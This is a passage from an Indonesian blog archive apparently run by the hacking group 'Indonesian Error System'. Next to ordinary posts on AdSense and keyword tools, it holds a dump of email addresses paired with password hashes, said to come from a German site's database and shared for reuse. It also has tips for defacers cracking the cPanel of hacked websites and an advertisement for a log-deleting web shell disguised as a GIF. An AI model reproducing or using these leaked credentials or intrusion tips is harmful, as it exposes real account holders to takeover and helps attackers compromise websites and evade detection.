Postingan

Menampilkan postingan dari Juni, 2020

Apa itu DFP dan fungsinya

        Bagi Anda seorang blogger, webmaster atau publisher yang menggunakan Google AdSense sebagai tools untuk memonetise trafficnya, pasti sudah tidak asing lagi dengan DFP . Namun apabila Anda sedang mencari into tentang apa itu DFP, lalu apa saja fungsinya , maka Anda sudah menemukan artikel yang tepat, karena disini akan dikupas tuntas mengenai penjelasan dan fungsi DFP secara gamblang.         Jadi silahkan ikuti artikel ini sampai selesai.Seperti namanya double click for publisher, tools ini diperuntukkan kepada seluruh publisher Google AdSense yang ingin menggunakannya.Fungsi DFP sendiri bagi seorang publihser adalah untuk : Mengelola dan sekaligus meningkatkan pengahasilan publisher dari iklan Google AdSense secara otomatis.        Jika sudah mengetahui fungsi DFP , maka pertanyaan selanjutnya yang muncul adalah bagaiamana cara kerjanya? Manarik. Karena salah satu tugas DFP adalah untuk memaksimalkan penghasilan dari iklan, maka DFP akan melakukan secreening iklan-i

5 Keyword Tools Free Yang Patut Dipertimbangkan!

Gambar
5 Keyword Tools Free Yang Patut Dipertimbangkan!       Halo sobat blogger, bagaimana kabarnya? Blog masih sepi. Jika benar demikian, ada beberapa hal yang harus dilakukan. Salah satu cara paling praktis untuk membuat blog kembali ramai, adalah dengan membuat artikely banyak dicari oleh user Google. Nah, dalam tulisan ini akan dibahas tentang keyword tools yang free dan pastinya bisa digunakan untuk riset keyword dengan baik. Dimana hasil riset keyword tersebut dapat digunakan untuk membuat artikel yang mendatangkan visitor blog atau web Anda. Lalu apa saja tools riset keywordnya? Ini dia : 1. Keyword tools yang pertama adalah Uber Suggest, tools besutan Neil Patel ini sudah digunakan oleh ribuan blogger. Dengan menggunakan Uber Suggest, keyword dapat digenerated dari blog lain. Dimana keyword yang muncul dari hasil generated tersebut dapat dimanfaatkan untuk membuat sebuah artikel. Kemudian apabila Anda sudah punya ide keyword, dengan menggunakan Uber Suggest, volume

Alternatif adsense terbukti membayar

Gambar
Alternatif adsense terbukti  membayar Halo sobat IES-team, kali ini saya akan membahas tentang alternatif google adsense,Kenapa saya membahas tentang alternatif google adsense? Karena bagi para blogger google adsense adalah pilihan terbaik bagi publishers untuk mendapatkan penghasilan tetapi karena ketatnya kebijakan dari google adsense banyak sekali yang sering di tolak, ada juga yang di banned maka dari pasti ada yang mencari alternatif google adsense.  dibawah ini adalah alternatif google adsense yang sudah saya rangkum dan terbukti membayar. MGID ADNOW ADSTERRA A-ADS MEDIA.NET PROPELLER ADS BUYSELL ADS ADMAVEN REVENUE HITS POPCHASH POPADS YLIIX ADSKEEPER JUICY ADS Di atas adalah rangkuman alternatif google adsense dari saya. Sekarang saya akan membahas lebih detail tentang alternatif google adsense yang sudah saya sebutkan di atas mulai dari persyaratan join, jumlah CPM nya hingga fitur-fitur nya agar kalian mudah memahami. 1.MGID        MGID ad

Daily empas country DE(german)

Halo sobat IES-team. Sudah lama saya tidak bagi-bagi empas karena memang sudah vakum tapi berhubung kemarin tidak sengaja dapet banyak empas di database web jerman jadi saya akan bagi-bagikan empas yang saya dapat dan yang jelas ini belum saya pakai. Jadi siapa cepat dia dapat. email|password kigyobebe@yahoo.com|5e2c85cc8d35f0110ff53b473ece9b54 cage2@freemail.hu|554838a8451ac36cb977e719e9d6623c inter09@citromail.hu|6c0a24483c3b8158eba5ddf01463c987 thrytohn@yahoo.com|cf7259e30f6c50c726ca26d8a64dc3c0 karel73@kapos-net.hu|45a6aab5c9aa2c07e63831410b5de498 fire0606@mynet.com|aab202642109e45338a182c44089b847 benczikpano@citromail.hu|1c8cfcc37811a9b0c7d75bf89d4b6829 jenra010@hotmail.com|fc9b5cfbada6edf391ad8f029c2d143e szabolcs.horvath@citromail.hu|86ff9c0abf2da621e3643efa3c092483 avp@o2online.de|df3ce9411ccb711f9e85a54428cc6d3d burtomi@freemail.hu|39945cae4896cefa15f01b63a3a7e214 isz@dontreg.com|49960fd911110a40c4cfec43e2e7603b sarah_connor@citromail.hu|0ea200c34dc5e4de7b3a2765bdfff711 k

Cara mengatasi kode verifikasi cPanel yang lambat

Gambar
Hallo gua D-GOD/Cirara akan memberikan tips "Cara mengatasi kode verifikasi cPanel yang lambat". Bagi para defacer pasti sering melakukan crack kepada cPanel website yang telah mereka retas. Tapi saat menunggu untuk kode verifikasi dari cPanel terkadang sangat lambat, atau bahkan tidak ada, nah disini gua akan memberikan tips nya. 1:Cek email di bagian SPAM. Nah biasanya kode verifikasi cpanel itu suka ada di bagian spam di email kamu, kalau belum ada setelah 5 menit refresh. 2:Menggunakan email gratis. Untuk tips yang ini kalian perlu masuk kedalam website ini untuk mendapatkan email secara gratis. Web: Click Here For Free Email . Setelah masuk tinggal kalian copy saja email yg langsung tersedia dari web tersebut. Dan pakailah untuk melakukan crack pada cPanel target kalian. Sekian tips simpel dari gua berdasarkan pengalaman gua sendiri, see you next time salam. Indonesian Error System

mini shell IES kalian wajib punya

Gambar
                  assalamualaikum..  hallo semua...  hallo juga dunia  hallo mantan gimana nyesel kan ninggalin..  mampuss oke semua.  kali ini gwe bakal ngasih kalian sebuah mini shell yang greget banget cuk. serius dah..  beneran greget.  gak percaya  coba aja  ini shell beda sama versi pertama nya ya.  kalau versi pertama nya cuma dellet log.  nahh shell ini punya fitur yang otomatis berjalan yang sangat mantap jiwa pokoknya. soalnya saya udah nyoba  di antara lain fitur nya gini -auto dellet log (dah pasti)  -terbaca server sebagai gif -lebih mudah ter upload  -dan ya ringan pokoknya  code nya di sini silahkan download  IES-SHELL tampilanya seperti ini form login  oh iya default password nya IES tampilan dalam nya kalau kalian bertanya  kenapa di encrypt dan pasword tidak bisa di ganti.   jawaban saya  agar tidak ada yang me recode shell nya  dan alasan kenapa pasword nggak bisa di ganti ya karna  awalnya itu shell